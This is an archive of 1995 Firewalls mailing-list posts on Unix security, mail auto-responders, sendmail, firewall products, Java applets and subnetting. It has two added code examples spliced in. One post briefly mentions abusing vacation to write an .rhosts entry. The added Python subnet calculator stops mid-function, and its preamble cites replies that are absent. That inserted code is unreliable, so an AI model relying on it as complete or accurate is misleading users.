> As an example, it amazes me that UNIX, which predates some
> proprietary systems, STILL doesn't understand what a labeled tape is

THANK GOODNESS!!

> and is unable to automatically associate which of several jobs wants
> to use a labeled tape which was just mounted on any drive. Any operations
> manager who deals with UNIX systems would love to get that.
> (Especially those who have used non-UNIX mainframe systems. I've
> talked to UNIX admins who don't have a clue what the above means.)

Gee... when I worked for a large company whose central server was Unix, they developed a procedure that when the user requested a tape mount they would be given access to the tape by creating a link to the device file under /mnt.
All the operator did is insert/mount the tape, run a program (tmount) saying drive X was to be allocated to user U using alias A that was requested by the user. When finished, the user had access to /mnt/A, which was a symbolic link to /dev/X, whose modes and owner were changed to allow only user U to access it. The entire procedure was a shell script. There was a corresponding tumount that undid everything, made sure the tape was rewound, and, if the drive was capable, ejected the tape. The operator who had a 3090 on one side and a Sun 490 on the other would rather type the created Unix tape mount than have to go through the JES2 commands needed to mount the tape under MVS.

> That is something which belongs in the kernel but which has been
> defaulted to third party developers (who also seem to not be able to
> get it right).

Programs and functions to read and write ANSI and IBM labeled tapes are available for free from many places on the net. Since I haven't needed them in a long time, I do not know where they are. As someone who has ported from mainframes to Unix (and is part of a MF->Unix conversion now) I can tell you this hasn't affected me!

> So, put security in the kernel: hopefully it will work right. Split
> privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe
> it will work properly in a multi-vendor environment.

Fat chance! Not as long as there are vendors out there selling systems with their own vision of compatibility and conformity to standards (SCO comes to mind!).

> Once you get there, though, you still have the networked SQL database
> engines which bypass all of UNIX (or any other platform's) system
> security by sticking their network service outside of the control of
> the kernel and who knows what other applications in the future (was
> that SEGA games?).

Then there are the "wrappers" around those databases and other programs so we users can get around certain of the very stupid licensing practices of some of these companies.
(NOTE: I will not debate licensing practices in this forum. Send email directly to me if you want to argue this point).

Everyone is talking gloom and doom for network security and the people involved. I think it's quite the opposite. There is a heightened realization in network security that there are more people concerned (albeit, not enough). Netscape's challenge, for example, was not a futile effort in chest pounding, but a point proving example on how our (the US's) laws may be a little out of touch with reality. So you know what happened? It got a response. That's part of the problem. It basically takes the ol' "hittin' them up side the head with a 2-by-4" to get noticed. I would like to get them to notice more often, and before a disaster occurs. However, when they notice, someone has to be there to pick up the pieces. Knowing that, I will be around a while charging for this service and having those who pay me grateful I am around--capitalism at its finest!! :-)

scott barman
--
scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
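The tmount/tumount procedure Scott Barman describes in the post above, written out as an added example. It is not the script from his post or from the company he mentions; the MNT_ROOT, DEV_DIR and TAPE_OWNER variables, the plain-name check and the mt(1) handling are my assumptions. The point it makes is that the symbolic link under /mnt is only a convenience for the user: what actually keeps everyone else off the drive is the chown/chmod on the device node, because anyone could open /dev/X directly.

```shell
#!/bin/sh
# Added example of a tmount/tumount pair in the style of the procedure
# described above (not Scott Barman's script). Variable names, the name
# check and the mt(1) handling are assumptions.

MNT_ROOT="${MNT_ROOT:-/mnt}"        # where per-user aliases are published
DEV_DIR="${DEV_DIR:-/dev}"          # where the tape device nodes live
TAPE_OWNER="${TAPE_OWNER:-root}"    # owner the drive is returned to on tumount

# Accept only a plain name: no slashes, no "..", no spaces. This is what
# stops a drive or alias argument from pointing the chown at some other file.
plain_name() {
    case "$1" in
        '' | *[!A-Za-z0-9_]*) return 1 ;;
    esac
    return 0
}

# tmount DRIVE USER ALIAS
#   Give USER exclusive use of DEV_DIR/DRIVE and publish it as MNT_ROOT/ALIAS.
tmount() {
    drive=$1 user=$2 name=$3
    if ! plain_name "$drive" || ! plain_name "$name"; then
        echo "tmount: drive and alias must be plain names" >&2; return 1
    fi
    dev="$DEV_DIR/$drive" link="$MNT_ROOT/$name"
    if ! [ -e "$dev" ]; then
        echo "tmount: no such drive: $dev" >&2; return 1
    fi
    # Never silently reassign a drive that is already allocated to someone.
    if [ -e "$link" ] || [ -L "$link" ]; then
        echo "tmount: alias $name already in use" >&2; return 1
    fi
    # The access control lives on the device node, not on the link:
    # owner-only read/write, owned by the requesting user.
    chown "$user" "$dev" || return 1
    chmod 0600 "$dev" || return 1
    ln -s "$dev" "$link"
}

# tumount ALIAS
#   Revoke the user's access, rewind/eject a real drive, return it to TAPE_OWNER.
tumount() {
    link="$MNT_ROOT/$1"
    if ! plain_name "$1" || ! [ -L "$link" ]; then
        echo "tumount: no such alias: $1" >&2; return 1
    fi
    dev=$(readlink "$link")
    rm -f "$link"
    # Only a real character device is rewound and ejected; a regular file
    # standing in for the drive on a test box is left alone.
    if [ -c "$dev" ] && command -v mt >/dev/null 2>&1; then
        mt -f "$dev" rewind 2>/dev/null || :
        mt -f "$dev" offline 2>/dev/null || :
    fi
    chmod 0600 "$dev" || return 1
    chown "$TAPE_OWNER" "$dev"
}
```

Before running it against real device nodes, point DEV_DIR and MNT_ROOT at a scratch directory with a regular file standing in for the drive and walk through the allocate/release cycle; the refusal to reuse an alias that is already taken is what prevents one user's tape from being quietly handed to another.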
From firewalls-owner Fri Sep 15 08:08:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05340 for firewalls-outgoing; Fri, 15 Sep 1995 07:57:50 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA05331 for ; Fri, 15 Sep 1995 07:57:45 -0700 Received: from dtw-29.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id LAA16931; Fri, 15 Sep 1995 11:19:38 -0700 Date: Fri, 15 Sep 1995 11:19:38 -0700 Message-Id: <199509151819.LAA16931@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Scott Barman From: janken@rust.net (Kenneth J. Stephens) Subject: Re: Firewall off Mortal Kombat XIV Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On Thu, 14 Sep 1995, william.wells wrote: >>I'm looking for an HP/UX system admin: I looked at tons of resumes >>yesterday and found lots of DOS/Windows people. That tells me that our >>upcoming batch of programmers are going to base their programming >>skills on what PCs have; not great for Corporate security. People are >>struggling with the concept of changing passwords; makes transferring >>files between systems too hard. They also complain about having to >>log into individual applications. People coming from the mainframe >>shops of the 70s and 80s generally have seen security work; not so >>with people whose only experience has been single user systems. > As a person who returned as a student to University of Michigan in the early 90s the problems appear to start with the instruction. (Speaking of starting Holy Wars) As a Capacity Planner and Security Officer I spend a large amount of time trying to stay current on technology. Most of my time at U of M was spent convincing my Profs that the technology they were teaching me was outdated. 
My answers on exams all needed to be explained because my methods produced the correct answers but the Profs did not understand how I got the answers. Security was not covered in any of my courses. Capacity and performance programming issues were given minimal coverage in some courses. Most students were glued to their Macintosh systems and would not use an INTEL based PC unless forced to by an instructor or already owned one. UNIX lived in the engineering school only and most non-engineering students had no access to UNIX workstations and were very happy about that fact. I attended U of M because it is U of M. I was not happy with the results. Others may have seen the same problems at other schools. Client server systems will only become what they should be when the educated programmer base is large enough to support the demand. The 4 year schools will not provide the required education. We look to the 2 year community colleges to provide programmers with real world skills. Check out your local 2 year schools for good programmer training programs. You may find a good pool of programmers who have the UNIX background you need.

>On Thu, 14 Sep 1995, scott barman wrote:
>All I need is for someone to tell me how I can better convince people
>they need to think about security without having to come up with new
>politically correct ways of bashing it into them.

As a gov employee (please hold your rotten tomatoes for later) who also consults on occasion, my experience is that the private sector will only be driven by the bottom line. Prove that the cost of a security breach is more than the cost of countermeasures and your budget will increase. This does not force non-management types to think about security, but it will get tools and/or staff that may force the gray matter to function. Sadly this will not work in gov organizations. Only a good auditor seems to work in gov. You may now launch the rotten tomatoes!
FYI: I attended a Reflex disknet anti-virus seminar yesterday. This product looks very very good. Does anyone have any comment/experience on this product? Please email directly if you feel this is not firewall material. I think this may be important to all of us on this list. My $.02.

Ken

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[] []
[] Ken Stephens Senior Capacity Planner/Data Security Officer []
[] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 []
[] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 []
[] 7th Fl. I.S. []
[] 7310 Woodward Ave []
[] Detroit, MI 48202 []
[] []
[] Millennium Consulting Your Security Policy is only []
[] 28234 Diesing Dr. as strong as your organization's []
[] Madison Heights, MI 48071 commitment to it. []
[] []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Fri Sep 15 09:02:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07529 for firewalls-outgoing; Fri, 15 Sep 1995 08:51:01 -0700 Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA07502 for ; Fri, 15 Sep 1995 08:50:49 -0700 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id IAA19714; Fri, 15 Sep 1995 08:49:25 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA29223; Fri, 15 Sep 1995 08:49:22 -0700 Received: by olympics.Eng.Sun.COM (SMI-8.6/CRAY-5.1) id IAA07613; Fri, 15 Sep 1995 08:40:02 -0700 Date: Fri, 15 Sep 1995 08:40:02 -0700 From: Brad.Powell@Eng.Sun.COM (Brad Powell) Message-Id: <199509151540.IAA07613@olympics.Eng.Sun.COM> To: firewalls@greatcircle.com, sjs@sunthing.sjsinc.com Subject: Re: Any known security holes in the "vacation" program X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

sjs writes:

>From firewalls-owner@GreatCircle.COM Thu Sep 14 21:49 PDT 1995 >Date: Thu, 14
Sep 1995 21:18:38 -0700 >From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) >To: firewalls@greatcircle.com >Subject: Any known security holes in the "vacation" program
>
>Folks:
>
> I'm trying to set up an auto-responder for a couple of mail aliases
>on my mailhost. For the moment, because I don't really want to get involved
>with majordomo or any of the other mail list programs, I am using the simple
>functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x.
>
> Given that the .forward file requires a pipe to this program, what
>are the possible security implications for this setup (i.e., are there any
>"well known" holes in this program)???

I wouldn't recommend it. vacation can write to files in the user's home directory; writing an rhosts entry jumps to mind.

=======================================================================
Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc.
======================================================================= From firewalls-owner Fri Sep 15 09:32:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08803 for firewalls-outgoing; Fri, 15 Sep 1995 09:17:38 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA08772 for ; Fri, 15 Sep 1995 09:17:27 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA08388; Fri, 15 Sep 1995 11:17:54 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 143390000; 15 Sep 95 12:14 CDT Received: from sctc.com by sccmailhost.sctc.com id 163910000; 15 Sep 95 12:14 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA06192; Fri, 15 Sep 1995 11:13:50 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA26436; Fri, 15 Sep 1995 11:13:49 -0500 From: Rick Smith Message-Id: <199509151613.LAA26436@shade.sctc.com> Subject: Re: Secure version of Sendmail To: Christian Kuhtz Date: Fri, 15 Sep 1995 11:13:49 -0500 (CDT) Cc: smith@sctc.com, jgt10@amdahl.com, firewalls@GreatCircle.COM In-Reply-To: <199509141914.OAA23838@psisa.com> from "Christian Kuhtz" at Sep 14, 95 02:14:35 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1733 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris asks: > So, what are you saying? The eternal bogus wisdom that there is no such thing > as a secure (including parts of it) seems to catch every single discussion > here. Get real and spare us with these academical discussions. The point of the discussion is hardly academic. It's practical. The original discussion, as I recall it, asked whether one e-mail server was somehow more secure than another. 
If you take the long view (say over the next 3-4 years) then they're equivalent because they do roughly the same job and have the same security limitations in general. In other words, any e-mail server software is probably going to be subject to a CERT advisory (or several) if it gets used enough. Thus, in both cases you need to constrain the server software in case it gets overrun.

> You can only provide security to a certain degree, that
> doesn't mean at all that your standards are necessarily low or anything.

I'd say your standards are "low" only if the organization can't afford the costs of an attack and you don't employ stronger countermeasures. Each organization makes its own tradeoff between Internet accessibility, administrative costs, and the value they place on the integrity of their internal computing systems. It is completely possible to have "terrible" security by some measure and still achieve organizational mission objectives in the face of Internet attacks. It just depends on what the organization's computers really do.

The point of this mailing list is to discuss alternative security measures applied at the site boundary. It's always important to describe alternatives in the context of their relative effectiveness.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Fri Sep 15 10:03:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09485 for firewalls-outgoing; Fri, 15 Sep 1995 09:31:43 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA09470 for ; Fri, 15 Sep 1995 09:31:33 -0700 Message-Id: <199509151631.JAA09470@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA191752584; Sat, 16 Sep 1995 02:29:44 +1000 From: Darren Reed Subject: IP Filter version 2.8 To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Sat, 16 Sep 1995 02:29:44 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2001 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Announcing IP Filter version 2.8

What is IP Filter?

Quick answer: a free packet filter which can be incorporated into any of the supported operating systems, providing packet level filtering per interface.

What's that mean to me?

It means you can build it into your network servers which have more than a single ethernet interface to protect your servers and internal networks from IP spoofing and other attacks which defeat service level access control methods. Also, if you're confident enough, you can use this package to help build your own firewall. I'd recommend using the TIS Firewall Toolkit in conjunction with this package if you think you're capable of this, or using it alone to build choke routers.
For more information, details and examples of filter rules, see: http://coombs.anu.edu.au/~avalon/ip-filter.html

New to this release:

* Solaris 2.4 (on ethernet interfaces ONLY) is now supported except for the return-rst and return-icmp options;
* Can now (optionally) log the first 128 bytes of a packet (if present), including the packet header;
* ipmon can now generate log entries with names in place of numerical hostname and port data by using the -N command line option;
* ipmon can now optionally log output through syslog using the new -s command line option;
* IPSO Basic Security Options filtering;
* In-kernel filtering can be turned on/off;
* Regression testing to check the correctness of the filter;
* IP test program (ipsend) is now included with the package to allow the administrator to send arbitrary IP packets, or replay packet sequences at the filter - runs on Linux, *BSD, Solaris2 and SunOS 4.1.x;
* Compacts IP header into a directly filterable form;
* Three-way filtering results, allowing packets which don't match any rule to be counted and subjected to a general policy of denial or permission;
* Perl script suggesting rules (and other changes needed) that you'll need to protect yourself from IP spoofing.
darren

From firewalls-owner Fri Sep 15 10:05:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09754 for firewalls-outgoing; Fri, 15 Sep 1995 09:37:13 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA09737 for ; Fri, 15 Sep 1995 09:37:01 -0700 Received: from pm3-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA05288; Fri, 15 Sep 95 11:33:56 -0400 Date: Fri, 15 Sep 95 11:33:56 -0400 Message-Id: <9509151533.AA05288@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ted Stockwell From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>> Date: Thu, 14 Sep 95 18:24:43
>> From: Frank Willoughby
>> Cc: firewalls@GreatCircle.COM
>>
>> >On the SNS Mail Guard the government evaluated the whole thing
>> >including the networking and application software.
>>
>> The implication in the above statement is that the Mail Guard
>> functions as a firewall. Not True. The SNS Mail Guard does
>> *not* function as a firewall.
>>
>> It has another purpose. I was told by a salesman who represented
>> the Sidewinder that it was blessed by the gov't powers-that-be as
>> *the* gov't sanctioned firewall. Hogwash. This was a gross
>> misrepresentation of the product that took some time and research to
>> unearth.
>
>[rest of complaint deleted]
>
>It is not clear to me what your bone of contention is. SNS is not
>designed to compete directly against traditional internet firewalls.
>It does have much in common with more conventional firewalls and the
>SNS effort had a considerable influence on the design of Sidewinder --
>Secure Computing's firewall for the traditional internet firewall
>market.
I was going to drop this, but since you posted to the entire list, I have an obligation to answer you.

Bones of contention:

1) The Sidewinder was claimed to firewall a number of government agencies as part of an approved configuration. Not true. The Sidewinder is not a part of this approved configuration, the SMG (Secure MailGuard) is. Two different products, two different functionalities as you point out. The problem is that this is not what was represented to me. What was represented to me was that the Sidewinder was acting as a firewall in the approved configuration. I was not impressed when I found out that this was not true.

2) The Sidewinder was supposed to have the capability of reading mails when delivered and blocking mails which may have a sensitive content - based on a keyword search. It still doesn't. An acquaintance of mine from another company talked to the engineering staff at Secure Computing. According to them, the mail-reading capability won't be delivered. Ever. (Which is not necessarily in light of the censorship

3) The Sidewinder was supposed to be able to filter/restrict applications & protocols to inbound, outbound, both, or none. When it was delivered, it only had *all* or *nothing*. If ftp or telnet were turned on, *bidirectional* access was turned on. 8^( A serious security problem in my humble opinion. Granted this problem was taken care of in the last release, but it should never have happened IMHO.

At the time, I had to recommend two firewalls to the management. V-ONE and Secure Computing were in the top two. Most of the firewalls I evaluated had security problems, were IP packet filter gateways (which disqualified them as an Internet firewall IMHO), had technical problems, were too expensive, too difficult (and/or expensive) to deploy on a large scale, were vaporware or any combination of the above.
My personal recommendation was the V-ONE because it was the only one at the time that was capable of preventing terminal session hijacking (that I evaluated). Management chose otherwise. If they had remembered to perform acceptance testing based on what was promised, the Sidewinder would probably have been returned. (I left the company before the firewall was installed). I should point out that item 1 above is based on my personal research. I know that it is true. Items 2 & 3 are based on people who are current Sidewinder customers. I have no reason to doubt the authenticity of this information.

Best Regards, Frank

>
>There is information on our web server (http://www.sctc.com) about the
>SNS program and the LOCKguard(tm) Standard Mail Guard (SMG). I would
>suggest people start there when wondering what SNS is and isn't.
>
>--
>disclaimer: I speak only for myself, etc, etc
>Ted Stockwell, stockwel@sctc.com, Sidewinder
>
>
>

From firewalls-owner Fri Sep 15 10:08:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11021 for firewalls-outgoing; Fri, 15 Sep 1995 09:56:48 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA11014 for ; Fri, 15 Sep 1995 09:56:43 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA08646; Fri, 15 Sep 1995 11:59:13 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 148120000; 15 Sep 95 12:55 CDT Received: from sctc.com by sccmailhost.sctc.com id 166840000; 15 Sep 95 12:55 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA07719; Fri, 15 Sep 1995 11:54:54 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA27791; Fri, 15 Sep 1995 11:54:53 -0500 From: Rick Smith Message-Id: <199509151654.LAA27791@shade.sctc.com> Subject: Re: Firewall
off Mortal Kombat XIV To: Ted Doty Date: Fri, 15 Sep 1995 11:54:53 -0500 (CDT) Cc: smith@sctc.com, firewalls@greatcircle.com In-Reply-To: <199509151258.IAA18920@kgbvax.network.com> from "Ted Doty" at Sep 15, 95 08:58:05 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1972 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty presents a view of authentication based security which I acknowledge, appreciate, and omit duplicating. I won't quibble with specifics. I agree that strong(er) authentication is about all you can do for some sites. It's not the Final Solution and it doesn't quite fit every problem, but it's often a viable approach. Regarding the following: > > balance responsibility for security between the application and the > > kernel. Neither can do the job alone. A boneheaded developer can > > implement an application with security holes just as effectively on a > > highly secure platform as on a DOS PC. > > Or keep out the outsiders, and trust that the insiders won't mess with you > too often, but audit the access to make sure that they don't. Look, I'd > LOVE to have application developers spend real brain-sweat on security, but > even if they did, you're still stuck with holes in libc (all right ... who > out there has actually gone through all the library routines?). Actually, I was referring to developers handling security in terms of transactional integrity. In other words, a major transaction is constructed of multiple separate steps that cross check one another. A good, secure implementation doesn't rely on a single action by a single, potentially subverted source. When I look at software development and audit requirements from more mainframeish organizations, I find that such techniques were known and actively enforced in careful shops. Unfortunately, the new generation of PC developers don't usually get this message. 
Someone noted that security in practice has many similarities to quality assurance measures. In both cases a generic mechanism may just get in the way and make things worse instead of better. On the other hand, they can both work very effectively when they're tailored to the specific problem, and they can become tools for success instead of failure. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 10:31:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA11294 for firewalls-outgoing; Fri, 15 Sep 1995 10:01:34 -0700 Received: from netcom21.netcom.com (netcom21.netcom.com [192.100.81.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA11281 for ; Fri, 15 Sep 1995 10:01:30 -0700 Received: by netcom21.netcom.com (8.6.12/Netcom) id JAA18708; Fri, 15 Sep 1995 09:53:51 -0700 Date: Fri, 15 Sep 1995 09:53:51 -0700 From: yevaud@netcom.com (Karl Wiebe) Message-Id: <199509151653.JAA18708@netcom21.netcom.com> To: firewalls@greatcircle.com Subject: Re: Any known security holes in the "vacation" program Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stefan: > I'm trying to set up an auto-responder for a couple of mail aliases >on my mailhost. For the moment, because I don't really want to get involved >with majordomo or any of the other mail list programs, I am using the simple >functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x. Well, you are better off using procmail for this, if you are going to do it at all. One reason is simply that vacation, being designed for the simple "I'm on vacation" setup, will only respond *once* to email from a given address; this is why it maintains its "database". > Given that the .forward file requires a pipe to this program, what >are the possible security implications for this setup (i.e., are there any >"well known" holes in this program)??? Yes, the program mailer in Sendmail in many cases can be subverted. 
One way to guard against this hackery is the smrsh shell wrapper command (get it from ftp.cert.org). Also, 8.6.12 has more checks by now. For (some) details, see BugTraq...

> BTW: I have already hard-coded a subject: line in the vacation.msg
> file and do not, and will not, put any of the variable substitutions in it.
> I have also shut down access to the "mailbots" home directory by any other
> user, other than root of course.

--Karl

From firewalls-owner Fri Sep 15 11:02:44 1995
From: Adam Shostack
X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School
Subject: Re: IBM NetSP
To: kahar@sebank.se
Date: Fri, 15 Sep 1995 13:45:13 -0400 (EDT)
Cc: firewalls@GreatCircle.COM

| I'm looking for comments and experiences with IBMs NetSP, Secured Network
| Gateway version 1.2. How does it compare to other products like BorderWare and
| FireWall-1?
I haven't seen version 1.2, but version one had some serious holes, including sendmail, and lacked any sort of self-integrity checker. Any security person worth their salt can fix both, but why not start with a product that works?

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Fri Sep 15 11:03:54 1995
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Fri, 15 Sep 1995 10:38:42 -0700
To: firewalls@greatcircle.com
Cc: scott@Disclosure.com
Subject: Re: I wish Java would go away ...

Hi folks, me again, Java guy. Thought I'd stop by for a moment to answer Scott's email and offer some concrete suggestions. First, understand that I work on Java so the truly paranoid should distrust everything I say :-)

Scott writes:

> I was wondering if anyone has done a security analysis of allowing Java
> applets behind a firewall?

And the answer is of course yes. We plan to have a more thorough security analysis paper available for FCS. In the meantime we welcome other analyses and comments.
> I finally got to see some documentation and (a) I am not impressed
> (Sun has this knack for doing neat things the wrong way--private email
> if you want to discuss this),

I think private email is probably the wrong way to go. What you should do is express your concerns publicly to the java-interest@java.sun.com alias. That way we can address/fix them. If you are uncomfortable doing that, you are more than welcome to discuss them with me privately. We can turn any legitimate concern into "showstopper" bugs that will prevent the release of 1.0 until they are fixed. If you have been following Java you will notice that the window stuff changed _radically_ between alpha and pre-Beta. This was in large part a response to what people on the lists were requiring.

> (b) I saw a lot of stuff regarding these applets and Unix, but what
> if the client machines are pee cees?
> The NT and Windoze 95 weenies are jumping up and down going "oooo neat!"
> I'm still responding "oy vey!" :-)

Interestingly enough the language is the same on PCs as it is on UNIX. It is still impossible to express a virus in Java, and it is still impossible to cons up some illegal byte codes and have them executed by the virtual machine on the other end. If you have any specific concerns I can address then please feel free to write or post to the java lists.

> I need feedback from anyone who has run or evaluated it with security
> in mind. Besides Sun's propaganda, are there any documents on the net
> I can pick up that comment on it, pro or con?

We at Sun would like your analyses as well. It does everyone a great disservice to "discover" some hole that we have not and then not tell us about it. The idea here is to provide a solid, secure foundation for doing interactive content. That is why a) Alpha has been so long, b) we release the source so that *every* question can be answered by personal investigation if you choose, and c) people like me solicit your input.

> One more important item... can anyone compare and contrast what Sun is
> doing vs. SGI's web stuff for both its technical merit and security?

I'm from Sun so discount this comment, but from what I've been able to gather "SGI's web stuff" consists of some third party ports of bits of web software and a marketing campaign called "WebForce". If there is actually anything new or novel in their "stuff" I'd like to know what it is.

--Chuck

From firewalls-owner Fri Sep 15 11:31:11 1995
From: Dean Waters
Date: Fri, 15 Sep 1995 11:00:18 -0700
To: firewalls@GreatCircle.COM
Subject: 5 bit subnet for Bastion

I don't know if this is the proper place for this but I will give it a try.

I am setting up a Livingston Firewall router and want to use only a small portion of one of our subnets for the unprotected host/hosts. It has been suggested that I use a 5-bit subnet for this. Is this feasible? If so, does that mean I would use 1-32 for hosts on that subnet? Then what subnet mask would I use?
Thanks for the help

--
Dean Waters                  E-mail: dwaters@RedBrick.COM
System Administrator         Red Brick Systems
Phone: 408-399-7103          Los Gatos, CA
Pager: 408-788-5818

From firewalls-owner Fri Sep 15 12:01:43 1995
From: maass@thinkfish.rhein-main.de (Joerg Maass)
Date: Fri, 15 Sep 1995 20:58:47 +0200
To: Craig McLellan
Cc: firewalls@GreatCircle.COM
Subject: Re: Does anyone do remote monitoring

Hi Craig,

> I have a customer who is looking for any firms that provide remote security
> monitoring. Anyone know of this???

Check out Polycenter Security Intrusion Detector and Security Compliance Manager from Digital Equipment. Client server based and runs on a variety of platforms. http://www.digital.com/

Please don't mail me for more information, since I'll be on holiday from next Monday on :-).

Kind regards
Joerg Maass

--
Am Tiergarten 22                 Tel.: +49/69/4990880
D-60316 Frankfurt                Fax : +49/6103/383-157
Germany
private: maass@thinkfish.rhein-main.de
biz.: Joerg.Maass@frs.mts.dec.com
PGP signature available upon request.
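Dean Waters's 5-bit subnet question above (and the two replies to it further on in this digest, one counting 32 subnets and the other 30) come down to the arithmetic of borrowing five host bits from a class C network. As an added example that is not any poster's code, the calculator below works the table out with Python's ipaddress module for the documentation prefix 192.0.2.0/24 (a constructed stand-in for the poster's own class C); the classical rule that subnet zero and the all-ones subnet are reserved is modelled by the allow_special flag, an assumed name.

```python
"""Class C subnet calculator for the "5 bit subnet" question.

Added example, not any poster's code.  Borrowing N bits from the 8-bit host
field of a class C network gives 2**N subnets of 2**(8-N) addresses each; the
first and last address of every subnet (network and broadcast) are never
assignable, and the classical RFC 950 rule also reserves the first (subnet
zero) and last (all-ones) subnet unless the router is told otherwise.
"""
import ipaddress

HOST_BITS_CLASS_C = 8


def subnet_mask(subnet_bits):
    """Dotted-quad mask for a class C split that borrows subnet_bits host bits."""
    if not 1 <= subnet_bits <= HOST_BITS_CLASS_C - 2:
        raise ValueError("subnet field must be 1..6 bits to leave assignable hosts")
    return str(ipaddress.ip_network("0.0.0.0/%d" % (24 + subnet_bits)).netmask)


def subnet_table(class_c, subnet_bits, allow_special=False):
    """One row per subnet of class_c (a /24 such as "192.0.2.0/24").

    allow_special=True models a router configured to use subnet zero and the
    all-ones subnet (assumed flag name); otherwise those rows are marked unusable.
    """
    base = ipaddress.ip_network(class_c, strict=True)
    if base.prefixlen != 24:
        raise ValueError("expected a class C (/24) network")
    subnet_mask(subnet_bits)  # reuse the range check on the bit count
    blocks = list(base.subnets(prefixlen_diff=subnet_bits))
    rows = []
    for index, block in enumerate(blocks):
        reserved = index in (0, len(blocks) - 1)
        rows.append({
            "network": str(block.network_address),
            "first_host": str(block.network_address + 1),
            "last_host": str(block.broadcast_address - 1),
            "broadcast": str(block.broadcast_address),
            "usable": allow_special or not reserved,
        })
    return rows


def usable_counts(subnet_bits, allow_special=False):
    """(usable subnets, assignable hosts per subnet) for the split."""
    subnet_mask(subnet_bits)
    subnets = 2 ** subnet_bits - (0 if allow_special else 2)
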